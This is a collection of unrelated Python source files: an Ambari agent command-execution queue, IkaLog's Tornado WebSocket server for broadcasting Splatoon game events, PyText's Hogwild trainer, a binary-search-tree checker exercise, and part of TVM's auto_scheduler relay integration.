self.commandQueue.put(queued_command)
else:
logger.info("Canceling " + queued_command['commandType'] + \
" for service " + queued_command['serviceName'] + \
" and role " + queued_command['role'] + \
" with taskId " + str(queued_command['taskId']))
# Kill if in progress
self.customServiceOrchestrator.cancel_command(task_id, reason)
def run(self):
try:
while not self.stop_event.is_set():
self.processBackgroundQueueSafeEmpty()
self.fillRecoveryCommands()
try:
if self.parallel_execution == 0:
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command == None:
break
self.process_command(command)
else:
# If parallel execution is enabled, just kick off all available
# commands using separate threads
while not self.stop_event.is_set():
command = self.commandQueue.get(True, self.EXECUTION_COMMAND_WAIT_TIME)
if command == None:
break
# If command is not retry_enabled then do not start them in parallel
# checking just one command is enough as all commands for a stage is sent
# at the same time and retry is only enabled for initial start/install
retryAble = False
if 'commandParams' in command and 'command_retry_enabled' in command['commandParams']:
retryAble = command['commandParams']['command_retry_enabled'] == "true"
if retryAble:
logger.info("Kicking off a thread for the command, id=" +
str(command['commandId']) + " taskId=" + str(command['taskId']))
t = threading.Thread(target=self.process_command, args=(command,))
t.daemon = True
t.start()
else:
self.process_command(command)
break
pass
pass
except (Queue.Empty):
pass
except:
logger.exception("ActionQueue thread failed with exception:")
raise
logger.info("ActionQueue thread has successfully finished")
def fillRecoveryCommands(self):
if not self.tasks_in_progress_or_pending():
self.put(self.recovery_manager.get_recovery_commands())
def processBackgroundQueueSafeEmpty(self):
while not self.backgroundCommandQueue.empty():
try:
command = self.backgroundCommandQueue.get(False)
if command.has_key('__handle') and command['__handle'].status == None:
self.process_command(command)
except Queue.Empty:
pass
def createCommandHandle(self, command):
if command.has_key('__handle'):
raise AgentException("Command already has __handle")
command['__handle'] = BackgroundCommandExecutionHandle(command, command['commandId'], None, self.on_background_command_complete_callback)
return command
def process_command(self, command):
# make sure we log failures
commandType = command['commandType']
logger.debug("Took an element of Queue (command type = %s)." % commandType)
try:
if commandType in [self.EXECUTION_COMMAND, self.BACKGROUND_EXECUTION_COMMAND, self.AUTO_EXECUTION_COMMAND]:
try:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_start()
self.recovery_manager.process_execution_command(command)
self.execute_command(command)
finally:
if self.recovery_manager.enabled():
self.recovery_manager.on_execution_command_finish()
else:
logger.error("Unrecognized command " + pprint.pformat(command))
except Exception:
logger.exception("Exception while processing {0} command".format(commandType))
def tasks_in_progress_or_pending(self):
return not self.commandQueue.empty() or self.recovery_manager.has_active_command()
def execute_command(self, command):
'''
Executes commands of type EXECUTION_COMMAND
'''
clusterId = command['clusterId']
commandId = command['commandId']
isCommandBackground = command['commandType'] == self.BACKGROUND_EXECUTION_COMMAND
isAutoExecuteCommand = command['commandType'] == self.AUTO_EXECUTION_COMMAND
message = "Executing command with id = {commandId}, taskId = {taskId} for role = {role} of " \
"cluster_id {cluster}.".format(
commandId = str(commandId), taskId = str(command['taskId']),
role=command['role'], cluster=clusterId)
logger.info(message)
taskId = command['taskId']
# Preparing 'IN_PROGRESS' report
in_progress_status = self.commandStatuses.generate_report_template(command)
# The path of the files that contain the output log and error log use a prefix that the agent advertises to the
# server. The prefix is defined in agent-config.ini
if not isAutoExecuteCommand:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'errors-' + str(taskId) + '.txt',
'structuredOut' : self.tmpdir + os.sep + 'structured-out-' + str(taskId) + '.json',
'status': self.IN_PROGRESS_STATUS
})
else:
in_progress_status.update({
'tmpout': self.tmpdir + os.sep + 'auto_output-' + str(taskId) + '.txt',
'tmperr': self.tmpdir + os.sep + 'auto_errors-' + str(taskId) + '.txt',
'structuredOut' : self.tmpdir + os.sep + 'auto_structured-out-' + str(taskId) + '.json',
'status': self.IN_PROGRESS_STATUS
})
self.commandStatuses.put_command_status(command, in_progress_status)
numAttempts = 0
retryDuration = 0 # even with 0 allow one attempt
retryAble = False
delay = 1
log_command_output = True
if 'commandParams' in command and 'log_output' in command['commandParams'] and "false" == command['commandParams']['log_output']:
log_command_output = False
if 'commandParams' in command:
if 'max_duration_for_retries' in command['commandParams']:
retryDuration = int(command['commandParams']['max_duration_for_retries'])
if 'command_retry_enabled' in command['commandParams']:
retryAble = command['commandParams']['command_retry_enabled'] == "true"
if isAutoExecuteCommand:
retryAble = False
logger.info("Command execution metadata - taskId = {taskId}, retry enabled = {retryAble}, max retry duration (sec) = {retryDuration}, log_output = {log_command_output}".
format(taskId=taskId, retryAble=retryAble, retryDuration=retryDuration, log_command_output=log_command_output))
command_canceled = False
while retryDuration >= 0:
numAttempts += 1
start = 0
if retryAble:
start = int(time.time())
# running command
commandresult = self.customServiceOrchestrator.runCommand(command,
in_progress_status['tmpout'],
in_progress_status['tmperr'],
override_output_files=numAttempts == 1,
retry=numAttempts > 1)
end = 1
if retryAble:
end = int(time.time())
retryDuration -= (end - start)
# dumping results
if isCommandBackground:
logger.info("Command is background command, quit retrying. Exit code: {exitCode}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, exitCode=commandresult['exitcode'], retryAble=retryAble, retryDuration=retryDuration, delay=delay))
return
else:
if commandresult['exitcode'] == 0:
status = self.COMPLETED_STATUS
else:
status = self.FAILED_STATUS
if (commandresult['exitcode'] == -signal.SIGTERM) or (commandresult['exitcode'] == -signal.SIGKILL):
logger.info('Command with taskId = {cid} was canceled!'.format(cid=taskId))
command_canceled = True
break
if status != self.COMPLETED_STATUS and retryAble and retryDuration > 0:
delay = self.get_retry_delay(delay)
if delay > retryDuration:
delay = retryDuration
retryDuration -= delay # allow one last attempt
commandresult['stderr'] += "\n\nCommand failed. Retrying command execution ...\n\n"
logger.info("Retrying command with taskId = {cid} after a wait of {delay}".format(cid=taskId, delay=delay))
if 'agentLevelParams' not in command:
command['agentLevelParams'] = {}
command['agentLevelParams']['commandBeingRetried'] = "true"
time.sleep(delay)
continue
else:
logger.info("Quit retrying for command with taskId = {cid}. Status: {status}, retryAble: {retryAble}, retryDuration (sec): {retryDuration}, last delay (sec): {delay}"
.format(cid=taskId, status=status, retryAble=retryAble, retryDuration=retryDuration, delay=delay))
break
# do not fail task which was rescheduled from server
if command_canceled:
with self.lock:
with self.commandQueue.mutex:
for com in self.commandQueue.queue:
if com['taskId'] == command['taskId']:
logger.info('Command with taskId = {cid} was rescheduled by server. '
'Fail report on cancelled command won\'t be sent with heartbeat.'.format(cid=taskId))
return
# final result to stdout
commandresult['stdout'] += '\n\nCommand completed successfully!\n' if status == self.COMPLETED_STATUS else '\n\nCommand failed after ' + str(numAttempts) + ' tries\n'
logger.info('Command with taskId = {cid} completed successfully!'.format(cid=taskId) if status == self.COMPLETED_STATUS else 'Command with taskId = {cid} failed after {attempts} tries'.format(cid=taskId, attempts=numAttempts))
roleResult = self.commandStatuses.generate_report_template(command)
roleResult.update({
'stdout': commandresult['stdout'],
'stderr': commandresult['stderr'],
'exitCode': commandresult['exitcode'],
'status': status,
})
if self.config.has_option("logging","log_command_executes") \
and int(self.config.get("logging", "log_command_executes")) == 1 \
and log_command_output:
if roleResult['stdout'] != '':
logger.info("Begin command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(roleResult['stdout'], str(command['taskId']))
logger.info("End command output log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if roleResult['stderr'] != '':
logger.info("Begin command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
self.log_command_output(roleResult['stderr'], str(command['taskId']))
logger.info("End command stderr log for command with id = " + str(command['taskId']) + ", role = "
+ command['role'] + ", roleCommand = " + command['roleCommand'])
if roleResult['stdout'] == '':
roleResult['stdout'] = 'None'
if roleResult['stderr'] == '':
roleResult['stderr'] = 'None'
# let ambari know name of custom command
if 'commandParams' in command and command['commandParams'].has_key('custom_command'):
roleResult['customCommand'] = command['commandParams']['custom_command']
if 'structuredOut' in commandresult:
roleResult['structuredOut'] = str(json.dumps(commandresult['structuredOut']))
else:
roleResult['structuredOut'] = ''
# let recovery manager know the current state
if status == self.COMPLETED_STATUS:
# let ambari know that configuration tags were applied
configHandler = ActualConfigHandler(self.config, self.configTags)
"""
#update
if 'commandParams' in command:
command_params = command['commandParams']
if command_params and command_params.has_key('forceRefreshConfigTags') and len(command_params['forceRefreshConfigTags']) > 0 :
forceRefreshConfigTags = command_params['forceRefreshConfigTags'].split(',')
logger.info("Got refresh additional component tags command")
for configTag in forceRefreshConfigTags :
configHandler.update_component_tag(command['role'], configTag, command['configurationTags'][configTag])
roleResult['customCommand'] = self.CUSTOM_COMMAND_RESTART # force restart for component to evict stale_config on server side
command['configurationTags'] = configHandler.read_actual_component(command['role'])
if command.has_key('configurationTags'):
configHandler.write_actual(command['configurationTags'])
roleResult['configurationTags'] = command['configurationTags']
component = {'serviceName':command['serviceName'],'componentName':command['role']}
if 'roleCommand' in command and \
(command['roleCommand'] == self.ROLE_COMMAND_START or
(command['roleCommand'] == self.ROLE_COMMAND_INSTALL and component in LiveStatus.CLIENT_COMPONENTS) or
(command['roleCommand'] == self.ROLE_COMMAND_CUSTOM_COMMAND and
'custom_command' in command['hostLevelParams'] and
command['hostLevelParams']['custom_command'] in (self.CUSTOM_COMMAND_RESTART, self.CUSTOM_COMMAND_START))):
configHandler.write_actual_component(command['role'],
command['configurationTags'])
if 'clientsToUpdateConfigs' in command['hostLevelParams'] and command['hostLevelParams']['clientsToUpdateConfigs']:
configHandler.write_client_components(command['serviceName'],
command['configurationTags'],
command['hostLevelParams']['clientsToUpdateConfigs'])
roleResult['configurationTags'] = configHandler.read_actual_component(
command['role'])
"""
self.recovery_manager.process_execution_command_result(command, status)
self.commandStatuses.put_command_status(command, roleResult)
def log_command_output(self, text, taskId):
"""
Logs a message as multiple enumerated log messages every of which is not larger than MAX_SYMBOLS_PER_LOG_MESSAGE.
If logs are redirected to syslog (syslog_enabled=1), this is very useful for logging big messages.
As syslog usually truncates long messages.
"""
chunks = split_on_chunks(text, MAX_SYMBOLS_PER_LOG_MESSAGE)
if len(chunks) > 1:
for i in range(len(chunks)):
logger.info("Cmd log for taskId={0} and chunk {1}/{2} of log for command: \n".format(taskId, i+1, len(chunks)) + chunks[i])
else:
logger.info("Cmd log for taskId={0}: ".format(taskId) + text)
def get_retry_delay(self, last_delay):
"""
Returns exponentially growing delay. The idea being if number of retries is high then the reason to retry
is probably a host or environment specific issue requiring longer waits
"""
return last_delay * 2
def command_was_canceled(self):
self.customServiceOrchestrator
def on_background_command_complete_callback(self, process_condensed_result, handle):
logger.debug('Start callback: %s' % process_condensed_result)
logger.debug('The handle is: %s' % handle)
status = self.COMPLETED_STATUS if handle.exitCode == 0 else self.FAILED_STATUS
aborted_postfix = self.customServiceOrchestrator.command_canceled_reason(handle.command['taskId'])
if aborted_postfix:
status = self.FAILED_STATUS
logger.debug('Set status to: %s , reason = %s' % (status, aborted_postfix))
else:
aborted_postfix = ''
roleResult = self.commandStatuses.generate_report_template(handle.command)
roleResult.update({
'stdout': process_condensed_result['stdout'] + aborted_postfix,
'stderr': process_condensed_result['stderr'] + aborted_postfix,
'exitCode': process_condensed_result['exitcode'],
'structuredOut': str(json.dumps(process_condensed_result['structuredOut'])) if 'structuredOut' in process_condensed_result else '',
'status': status,
})
self.commandStatuses.put_command_status(handle.command, roleResult)
def execute_status_command_and_security_status(self, command):
component_status_result = self.customServiceOrchestrator.requestComponentStatus(command)
return command, component_status_result
def status_update_callback(self):
"""
Actions that are executed every time when command status changes
"""
self.controller.trigger_heartbeat()
# Removes all commands from the queue
def reset(self):
queue = self.commandQueue
with queue.mutex:
queue.queue.clear()
|
websocket_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os
import sys
import threading
import time
# Needed in GUI mode
try:
import wx
except:
pass
try:
import tornado.ioloop
import tornado.web
import tornado.websocket
import tornado.template
_tornado_imported = True
except:
_tornado_imported = False
from ikalog.utils import *
_ = Localization.gettext_translation('websocket_server', fallback=True).gettext
# IkaLog Output Plugin: WebSocket server.
websockets = []
class IndexHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(self):
# For testing....
self.render("index.html")
class WebSocketHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
print('%s: origin %s' % (self, origin))
return True
def open(self):
IkaUtils.dprint("%s: Connected" % self)
websockets.append(self)
def on_message(self, message):
pass
def on_close(self):
IkaUtils.dprint("%s: Closed" % self)
del websockets[websockets.index(self)]
class WebSocketServer(object):
def _send_message(self, d):
if len(websockets) == 0:
return
IkaUtils.dprint('%s: number of websockets = %d' %
(self, len(websockets)))
d_json = json.dumps(d, separators=(',', ':'), ensure_ascii=False)
for s in websockets:
IkaUtils.dprint(' Sending a message to %s' % s)
s.write_message(d_json)
def on_game_killed(self, context):
self._send_message({
'event': 'on_game_killed'
})
def on_game_dead(self, context):
self._send_message({
'event': 'on_game_dead'
})
def on_game_death_reason_identified(self, context):
self._send_message({
'event': 'on_death_reason_identified',
'reason': context['game'].get('last_death_reason', ''),
})
def on_game_go_sign(self, context):
self._send_message({
'event': 'on_game_go_sign'
})
def on_game_start(self, context):
self._send_message({
'event': 'on_game_start',
'stage': IkaUtils.map2id(context['game']['map'], 'unknown'),
'rule': IkaUtils.rule2id(context['game']['rule'], 'unknown'),
})
def on_game_team_color(self, context):
self._send_message({
'event': 'on_game_team_color',
'my_team_color_hsv': context['game']['team_color_hsv'][0].tolist()[0],
'counter_team_color_hsv': context['game']['team_color_hsv'][1].tolist()[0],
})
def on_lobby_matching(self, context):
self._send_message({
'event': 'on_lobby_matching',
'lobby_state': context['lobby'].get('state', None),
'lobby_type': context['lobby'].get('type', None),
})
def on_lobby_matched(self, context):
self._send_message({
'event': 'on_lobby_matched',
'lobby_state': context['lobby'].get('state', None),
'lobby_type': context['lobby'].get('type', None),
})
def on_game_finish(self, context):
self._send_message({
'event': 'on_game_finish',
})
# Common events to ranked battles.
def on_game_ranked_we_lead(self, context):
self._send_message({'event': 'on_game_ranked_we_lead'})
def on_game_ranked_they_lead(self, context):
self._send_message({'event': 'on_game_ranked_they_lead'})
# Ranked, Splatzone battles
def on_game_splatzone_we_got(self, context):
self._send_message({'event': 'on_game_splatzone_we_got'})
def on_game_splatzone_we_lost(self, context):
self._send_message({'event': 'on_game_splatzone_we_lost'})
def on_game_splatzone_they_got(self, context):
self._send_message({'event': 'on_game_splatzone_they_got'})
def on_game_splatzone_they_lost(self, context):
self._send_message({'event': 'on_game_splatzone_they_lost'})
# Ranked, Rainmaker battles
def on_game_rainmaker_we_got(self, context):
self._send_message({'event': 'on_game_rainmaker_we_got'})
def on_game_rainmaker_we_lost(self, context):
self._send_message({'event': 'on_game_rainmaker_we_lost'})
def on_game_rainmaker_they_got(self, context):
self._send_message({'event': 'on_game_rainmaker_they_got'})
def on_game_rainmaker_they_lost(self, context):
self._send_message({'event': 'on_game_rainmaker_they_lost'})
# Ranked, Tower control battles
def on_game_tower_we_got(self, context):
self._send_message({'event': 'on_game_tower_we_got'})
def on_game_tower_we_lost(self, context):
self._send_message({'event': 'on_game_tower_we_lost'})
def on_game_tower_they_got(self, context):
self._send_message({'event': 'on_game_tower_they_got'})
def on_game_tower_they_lost(self, context):
self._send_message({'event': 'on_game_tower_they_lost'})
# Counter / ObjectTracking.
def on_game_paint_score_update(self, context):
self._send_message({
'event': 'on_game_paint_score_update',
'paint_score': context['game'].get('paint_score', 0)
})
# Result scenes.
def on_result_judge(self, context):
self._send_message({
'event': 'on_result_judge',
'judge': context['game'].get('judge', None),
'knockout': context['game'].get('knockout', None),
})
def on_result_udemae(self, context):
# FIXME: データ追加
self._send_message({
'event': 'on_result_udemae',
})
def on_result_gears(self, context):
# FIXME: データ追加
self._send_message({
'event': 'on_result_gears',
})
def on_result_festa(self, context):
# FIXME: フェスの自分のタイトルが知りたい
game = context['game']
self._send_message({
'event': 'on_result_festa',
'festa_exp_pre': game.get('reslut_festa_exp_pre', None),
'festa_exp': game.get('reslut_festa_exp', None),
})
def on_game_individual_result(self, context):
me = IkaUtils.getMyEntryFromContext(context)
print(me)
self._send_message({
'event': 'on_result_detail',
'won': context['game'].get('won', None),
'rank': me.get('rank', None),
'score': me.get('score', None),
'udemae': me.get('udemae_pre', None),
'kills': me.get('kills', None),
'deaths': me.get('deaths', None),
'weapon': me.get('weapon', None),
})
def on_result_udemae(self, context):
d = context['scenes']['result_udemae']
self._send_message({
'event': 'on_result_udemae',
'udemae_str': d.get('udemae_str_after', None),
'udemae_exp': d.get('udemae_exp_after', None),
})
def on_result_gears(self, context):
self._send_message({
'event': 'on_result_gears',
})
def on_game_session_end(self, context):
self._send_message({
'event': 'on_game_session_end',
})
def worker_func(self, websocket_server):
print(websocket_server)
self.application = tornado.web.Application([
(r'/', IndexHandler),
(r'/ws', WebSocketHandler),
])
# FIXME: bind_addr
self.application.listen(websocket_server._port)
IkaUtils.dprint('%s: Listen port %d' % (self, websocket_server._port))
IkaUtils.dprint('%s: Started server thread' % self)
tornado.ioloop.IOLoop.instance().start()
IkaUtils.dprint('%s: Stopped server thread' % self)
def shutdown_server(self):
tornado.ioloop.IOLoop.instance().stop()
def initialize_server(self):
if self.worker_thread is not None:
if self.worker_thread.is_alive():
IkaUtils.dprint(
'%s: Waiting for shutdown of server thread' % self)
self.shutdown_server()
# XXX
while self.worker_thread.is_alive():
time.sleep(2)
IkaUtils.dprint('%s: server is shut down.' % self)
if not self._enabled:
return
self.worker_thread = threading.Thread(
target=self.worker_func, args=(self,))
self.worker_thread.daemon = True
self.worker_thread.start()
# IkaUI Handlers
def apply_ui(self):
self._enabled = self.check_enable.GetValue()
self._port = int(self.edit_port.GetValue())
self.initialize_server()
def refresh_ui(self):
self.check_enable.SetValue(self._enabled)
if not self._port is None:
self.edit_port.SetValue(str(self._port))
else:
self.edit_port.SetValue('9090')
self._internal_update = False
def on_config_reset(self, context=None):
self._enabled = False
self._host = '127.0.0.1'
self._port = '9090'
def on_config_load_from_context(self, context):
self.on_config_reset(context)
try:
conf = context['config']['websocket_server']
except:
conf = {}
if 'Enable' in conf:
self._enabled = conf['Enable']
if 'port' in conf:
try:
self._port = int(conf['port'])
except ValueError:
IkaUtils.dprint('%s: port must be an integer' % self)
self._port = 9090
self.refresh_ui()
self.initialize_server()
return True
def on_config_save_to_context(self, context):
context['config']['websocket_server'] = {
'Enable': self._enabled,
'port': self._port,
}
def on_config_apply(self, context):
self.apply_ui()
def on_option_tab_create(self, notebook):
self.panel = wx.Panel(notebook, wx.ID_ANY)
self.page = notebook.InsertPage(0, self.panel, _('WebSocket Server'))
self.layout = wx.BoxSizer(wx.VERTICAL)
self.check_enable = wx.CheckBox(
self.panel, wx.ID_ANY, _('Enable WebSocket Server'))
self.edit_port = wx.TextCtrl(self.panel, wx.ID_ANY, 'port')
layout = wx.GridSizer(2)
layout.Add(wx.StaticText(self.panel, wx.ID_ANY, _('Listen port')))
layout.Add(self.edit_port)
self.layout.Add(self.check_enable)
self.layout.Add(wx.StaticText(
self.panel, wx.ID_ANY,
_('WARNING: The server is accessible by anyone.'),
))
self.layout.Add(layout, flag=wx.EXPAND)
self.panel.SetSizer(self.layout)
def __init__(self, enabled=False, bind_addr='127.0.0.1', port=9090):
if not _tornado_imported:
print("モジュール tornado がロードできませんでした。 WebSocket サーバが起動できません。")
print("インストールするには以下のコマンドを利用してください。\n pip install tornado\n")
return
self._enabled = enabled
self._port = 9090
self.worker_thread = None
self.initialize_server()
if __name__ == "__main__":
obj = WebSocketServer(object)
|
hogwild_trainer.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Any, Tuple
import torch
import torch.multiprocessing as mp
from pytext.common.constants import Stage
from pytext.config import PyTextConfig
from pytext.config.pytext_config import ConfigBase
from pytext.metric_reporters import MetricReporter
from pytext.models.model import Model
from pytext.trainers.trainer import Trainer
from pytext.utils import cuda
from torchtext.data import Iterator
class HogwildTrainer(Trainer):
class Config(ConfigBase):
real_trainer: Trainer.Config = Trainer.Config()
num_workers: int = 1
@classmethod
def from_config(cls, config: Config, model: torch.nn.Module, *args, **kwargs):
# can't run hogwild on cuda
if cuda.CUDA_ENABLED or config.num_workers == 1:
return Trainer(config.real_trainer, model)
return cls(config.real_trainer, config.num_workers, model, *args, **kwargs)
def __init__(
self, real_trainer_config, num_workers, model: torch.nn.Module, *args, **kwargs
):
super().__init__(real_trainer_config, model, *args, **kwargs)
self.num_workers = num_workers
def _run_epoch(
self,
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch=lambda: None,
backprop=lambda loss, timer=None: None,
rank=0,
num_samples_to_log_progress=1000,
):
if stage == Stage.TRAIN:
processes = []
for worker_rank in range(self.num_workers):
# Initialize the batches with different random states.
data_iter.batches.init_epoch()
p = mp.Process(
target=super()._run_epoch,
args=(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
worker_rank,
num_samples_to_log_progress,
),
)
processes.append(p)
p.start()
for p in processes:
p.join()
else:
return super()._run_epoch(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
rank,
num_samples_to_log_progress,
)
def train(
self,
train_iter: Iterator,
eval_iter: Iterator,
model: Model,
metric_reporter: MetricReporter,
pytext_config: PyTextConfig,
*args,
**kwargs
) -> Tuple[torch.nn.Module, Any]:
print("Num of workers for Hogwild Training is {}".format(self.num_workers))
# Share memory of tensors for concurrent updates from multiple processes.
if self.num_workers > 1:
for param in model.parameters():
param.share_memory_()
return super().train(
train_iter, eval_iter, model, metric_reporter, pytext_config
)
|
6-3.py
|
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
def IsBinarySearchTree(j, mn, mx):
if not j in tree: return True
if tree[j][0] < mn or tree[j][0] > mx: return False
return IsBinarySearchTree(tree[j][1], mn, tree[j][0] - 1) and IsBinarySearchTree(tree[j][2], tree[j][0], mx)
def main():
nodes = int(sys.stdin.readline().strip())
global tree
tree, int_max, int_min = {}, 2147483647, -2147483648
for i in range(nodes):
tree[i] = (list(map(int, sys.stdin.readline().strip().split())))
if IsBinarySearchTree(0, int_min, int_max):
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target = main).start()
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import json
import logging
import threading
import traceback
import warnings
import tvm
from tvm import autotvm, transform
from tvm._ffi.base import TVMError
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.target import Target
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import Reduce
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG, LayoutRewriteOption
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .utils import get_const_tuple
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target, opt_level=3):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=opt_level,
config={
"relay.backend.use_auto_scheduler": True,
},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
mod = tvm.IRModule.from_expr(mod) if isinstance(mod, relay.Function) else mod
try:
compiler.lower(mod, target)
except TVMError:
logger.warning("Got exception in task extraction:\n %s", traceback.format_exc())
finally:
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod,
params,
target,
target_host=None,
hardware_params=None,
include_simple_tasks=False,
dump_workload_to_dag_log=None,
opt_level=3,
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
dump_workload_to_dag_log: Optional[str]
A file to dump an association between the workload keys and the actual DAG
opt_level : Optional[int]
The optimization level of the task extractions.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
if target_host is not None:
warnings.warn(
"target_host parameter is going to be deprecated. "
"Please pass in tvm.target.Target(target, host=target_host) instead."
)
target, target_host = Target.check_and_update_host_consist(target, target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
dispatch_ctx = DispatchContext.current
old_verbose = dispatch_ctx.verbose
dispatch_ctx.verbose = 0
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(
target=call_all_topi_funcs, args=(mod, params, target, opt_level)
)
build_thread.start()
build_thread.join()
dispatch_ctx.verbose = old_verbose
# create search tasks
tasks = []
weights = []
for wkl_key, (weight, func_names) in env.wkl_key_to_weight.items():
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
hardware_params=hardware_params,
# When auto scheduler is used in end to end network, try to apply layout rewrite
# to improve the overall performance
layout_rewrite_option=LayoutRewriteOption.get_target_default(target, True),
task_inputs=(
env.wkl_key_to_input_names[wkl_key]
if wkl_key in env.wkl_key_to_input_names
else None
),
task_inputs_save_to_file=True,
desc=",".join(func_names),
)
)
weights.append(int(weight))
if dump_workload_to_dag_log is not None:
with open(dump_workload_to_dag_log, "w") as f:
json.dump({task.workload_key: str(task.compute_dag) for task in tasks}, f)
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
# same as EXTRACT_TASK but ignore the task without complex ops
EXTRACT_COMPLEX_TASK_ONLY = 1
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.func_name_to_wkl_key = {}
self.wkl_key_to_weight = {}
self.wkl_key_to_input_names = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, func_name, workload_key):
"""Add the workload key of a search task.
Parameters
----------
func_name: str
The function name of the task.
workload_key: str
The workload key of a task.
"""
self.func_name_to_wkl_key[func_name] = workload_key
if workload_key not in self.wkl_key_to_weight:
self.wkl_key_to_weight[workload_key] = (0, set())
weight, func_names = self.wkl_key_to_weight[workload_key]
func_names.add(func_name)
self.wkl_key_to_weight[workload_key] = (weight + 1, func_names)
def add_workload_input_names(self, workload_key, input_names):
"""Add special task inputs to this workload.
Parameters
----------
workload_key : str
The workload key of a task.
input_names : List[str]
A list of input names.
"""
self.wkl_key_to_input_names[workload_key] = input_names
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get input/output tensors and
other useful information.
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors with static shape
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
has_complex_op: bool
Whether the topi compute function includes at least one complex (reduce) op
"""
layout_free_ops = []
inputs = []
has_complex_op = False
visited = set()
def traverse(t):
nonlocal has_complex_op
# We cannot directly add tensors to the set, because the comparison of
# two tensors with ndim=0 is ambiguous.
assert t.handle is not None
if t.handle.value in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
has_complex_op = has_complex_op or any([isinstance(e, Reduce) for e in t.op.body])
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t.handle.value)
